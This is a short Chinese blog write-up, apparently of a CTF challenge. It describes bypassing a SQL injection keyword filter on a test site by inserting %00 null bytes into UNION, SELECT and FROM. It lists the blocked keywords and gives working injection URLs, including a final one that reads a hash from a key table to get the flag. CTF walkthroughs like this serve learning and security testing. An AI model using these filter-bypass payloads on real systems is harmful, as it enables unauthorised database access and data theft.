1. 程式人生 > >sql註入之大過濾

sql註入之大過濾

sql註入 過濾繞過

首先來到測試網站:http://103.238.227.13:10087/?id=1


技術分享圖片

通過最後兩行發現有兩個字段:



並且發現過濾了以下內容,郁悶。

table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit'

直接上sqlmap,然而並沒有什麽用。


開始嘗試繞過:http://103.238.227.13:10087/?id=-1+union+select+1,database() %23

技術分享圖片


發現不行。


繼續測試:用00截斷:

http://103.238.227.13:10087/?id=-1 un%00ion sele%00ct 1,database() %23


技術分享圖片


發現成功了。


訪問http://103.238.227.13:10087/?id=-1 un%00ion sele%00ct 1, hash fr%00om sql3.key %23得到flag


技術分享圖片






sql註入之大過濾